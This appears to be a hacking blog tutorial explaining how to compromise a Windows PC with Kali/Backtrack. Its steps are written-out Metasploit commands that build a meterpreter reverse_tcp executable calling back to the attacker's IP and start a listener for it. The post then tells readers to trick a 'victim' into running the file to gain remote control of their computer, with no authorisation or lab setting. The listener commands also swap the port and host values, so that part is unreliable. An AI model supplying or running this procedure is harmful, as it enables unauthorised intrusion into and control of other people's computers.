WHAT'S NEW?
Loading...

How to hack windows using kali/backtrack

Below is a step by step tutorial on how to hack a windows PC using Kali/ Backtrack.

Requirments:
1. Kali / Backtrack OS- Can be Downloaded from >>>>here<<<<
2. A PC
3. Internet

Procedure:
I would recommend you to burn the ISO on a USB or DVD and run it through them because using it in VMWare or Virtual Box will work only if the target in in the same LAN/Network. And also prefer to use the internet directly through modem (not router) because if you want to do it through your router, then you will also have to perform port forwarding in your router.

1. Run Kali/ Backtrack
2. Open the browser and go to whatismyipaddress.com . Note down the IP.
3. Open terminal and type:

     msfpayload windows/meterpreter/reverse_tcp LHOST=your IP LPORT=4444 x > /root/Desktop/example.exe

Note: Replace "your IP" in the above code with your IP address which we found out before.

4. Now you will get a file called example.exe on the desktop.
5. Now, close that terminal and open a new one and type the following code one by one:


msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT your IP
set LHOST 4444
exploit

Note: Replace your IP with your IP address we found before


6. After executing all of the above codes, give the file example.exe to your victim and convince him to somehow open your file.
7. As soon as he opens the file you will se some text running on your terminal and then you have access to his computer.

Now you can download the text file from >>> here <<< and use the following commands to control his PC.


That's all for this trick. Enjoy hacking and do go to our new youtube channel : hackersliteyoutube.tk to enjoy videos regarding hacking.

Stay Updated on Twitter : www.twitter.com/hackerslite
Do like our facebook page  www.facebook.com/hackerslite.

1 comment: Leave Your Comments

  1. Thanks a lot...This is really working

    ReplyDelete